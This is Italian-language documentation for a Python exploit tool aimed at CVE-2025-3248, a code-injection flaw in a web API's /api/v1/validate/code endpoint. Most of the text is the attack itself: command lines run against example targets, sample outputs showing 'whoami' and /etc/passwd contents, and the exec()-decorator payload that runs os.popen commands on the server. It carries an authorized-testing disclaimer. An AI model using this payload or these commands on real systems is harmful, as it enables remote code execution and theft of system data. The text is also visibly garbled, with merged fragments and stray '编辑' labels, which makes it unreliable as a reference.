
Exploit basato su Python per CVE-2025-3248, una vulnerabilità di code injection in un'API web. Esegue comandi di sistema arbitrari tramite payload appositamente creati per test di penetrazione autorizzati.
Documentazione dello strumento di exploit per CVE-2025-3248
Questo strumento viene utilizzato per sfruttare la vulnerabilità CVE-2025-3248 (una vulnerabilità di injection di codice Python), costruendo un payload malevolo per ottenere l'esecuzione remota di comandi (RCE) sul server target. La vulnerabilità risiede in un'interfaccia API di una web application; un attaccante può sfruttare un punto di esecuzione di codice non verificato per iniettare codice Python arbitrario.
Avviso importante: Questo strumento è destinato solo a test di sicurezza autorizzati. Test di penetrazione non autorizzati potrebbero violare la legge. Assicurati di avere un'autorizzazione esplicita per il sistema target.
/api/v1/validate/codewhoami, ls, ecc.)
编辑
python cve-2025-3248.py -t <URL_target> -c "<comando>" [opzioni]
编辑
python cve-2025-3248.py -t http://192.168.1.100:7860 -c "whoami"
Esempio di output:
[+] Comando eseguito con successo
--------------------------------------------------
www-data
--------------------------------------------------
编辑
python cve-2025-3248.py -t https://app.example.com -c "cat /etc/passwd" -o json -v
Esempio di output:
{
"status": 200,
"content": "root:x:0:0:root:/root:/bin/bash\n...",
"success": true
}
code nell'endpoint /api/v1/validate/codeexec() per eseguire il codice Python passato
import os
@exec("raise Exception(os.popen('whoami').read())")
def f():
pass
os.popen() per eseguire comandi di sistema⚠️ Questo strumento è solo per test di penetrazione autorizzati ⚠️
Raccomandazioni:
-v per visualizzare log dettagliati ed evitare errori operativirequests (da installare preventivamente)
编辑
pip install requests
/api/v1/validate/codeexec/eval)Questo documento è solo per scopi di ricerca sulla sicurezza e formazione. L'autore non si assume alcuna responsabilità per danni diretti o indiretti derivanti dall'uso di questo strumento. Si prega di rispettare le leggi e i regolamenti, utilizzando gli strumenti di sicurezza in modo legale.
| Parametro | Obbligatorio | Descrizione |
|---|
-t, --target | Sì | URL target (formato: http://ip:port) |
-c, --command | Sì | Comando di sistema da eseguire (da racchiudere tra virgolette) |
-o, --output | No | Formato di output (text/json, default text) |
--timeout | No | Timeout della richiesta (secondi, default 10) |
-v, --verbose | No | Mostra log di esecuzione dettagliati |
| Codice errore | Causa | Soluzione |
|---|
[-] Errore formato URL target | URL mancante di scheme o host | Controllare il formato dell'URL (es. http://127.0.0.1:8080) |
[-] Timeout richiesta | La risposta del target ha superato il timeout | Aumentare il valore del parametro --timeout |
[-] Errore di connessione | Target non raggiungibile/blocco firewall | Verificare la connettività di rete |
[-] Esecuzione comando fallita Codice HTTP: 403 | Rifiuto di autorizzazione del server | Confermare che il servizio target permetta l'esecuzione di codice |